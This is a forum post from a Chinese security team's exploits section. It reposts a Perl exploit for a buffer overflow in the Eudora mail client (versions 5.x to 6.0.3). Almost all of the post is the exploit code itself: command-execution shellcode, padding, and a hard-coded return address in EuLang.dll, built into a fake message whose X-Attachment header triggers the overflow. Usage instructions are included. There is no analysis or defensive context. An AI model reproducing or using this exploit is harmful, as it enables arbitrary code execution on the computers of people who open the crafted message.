Eudora versions 5.x to 6.0.3 local exploit

风泽

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员 CIO

帖子: 452
精华: 26
积分: 6241
阅读权限: 200
性别: 男
在线时间: 1007 小时
注册时间: 2004-7-6
最后登录: 2008-9-6

原创技术奖软件研发奖核心建议奖优秀管理奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-7-18 11:23 只看该作者

Eudora versions 5.x to 6.0.3 local exploit

# Author:       LibX (libx@easydoesit.com)
# Date:             29-06-2004
# Exploit #:       1

# Program:       Eudora
# Tested on:       v5.1 / v6.0.1.1 / v6.0.22 / v6.0.3 All English (NT/2K/XP all service packs)
# Exploit Type:       Local Buffer overflow
# Shellcode:       Shellcode to execute a command
# Shellcode version:    v2.5 PRIVATE (GENERIC)
# How-tu-use:       EudExploit.pl <command to execute> > <urfilename>.sta

以下是程序代码：

复制内容到剪贴板

代码:

if(!($ARGV[0]))

{



     print("Eudora v5.x to <6.1 attachment bufferoverflow exploit v2.5");

     print("Usage: EudExploit.pl <command to execute> > <urfilename>.sta\n\n");

     print("Sample: EudExploit.pl notepad.exe > TestShell.sta");

     exit;



}







# command execution shellcode

$shellcode =          "\xEB\x6D\x5F\xB9\x11\x11\x11\x11" .

              "\x89\xCB\xFC\xB0\xFF\xF2\xAE\x87" .

              "\xD9\x29\xD9\x81\xC7\x10\x11\x11" .

              "\x11\x81\xEF\x11\x11\x11\x11\xFE" .

              "\x07\x81\xC1\x10\x11\x11\x11\x81" .

              "\xE9\x11\x11\x11\x11\x29\xCF\x31" .

              "\xF6\x46\x56\x57\xBB\x66\x8B\x45" .

              "\x0C\xB9\x11\x11\x11\x11\xB8\x41" .

              "\x11\x11\x11\x2D\x32\x11\x11\x11" .

              "\x64\x8B\x40\x21\x8B\x40\x0C\x8B" .

              "\x70\x1C\xAD\x8B\x78\x08\x47\xB0" .

              "\x66\xF2\xAE\xEB\x01\x90\x4F\xFF" .

              "\x37\x5E\x39\xF3\x74\x02\xEB\xEE" .

              "\x8D\x47\xEA\xFF\xD0\xCD\x03\xE8" .

              "\x8E\xFF\xFF\xFF" . $ARGV[0] . "\xFF";







# some crap

$buffer          = "A" x (268 - length($shellcode));







# EuLang.dll universal return address (625010E9: call edi)

$return          = "\xE9\x10\x50\x62";







print("From: me\n");

print("To: you\n");

print("Subject: Eudora 5.x/<6.1 buffer overflow exploit\n");

print("X-Attachment: " . $shellcode . $buffer . $return . "\n\n");

http://hi.baidu.com/fengze

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Eudora versions 5.x to 6.0.3 local exploit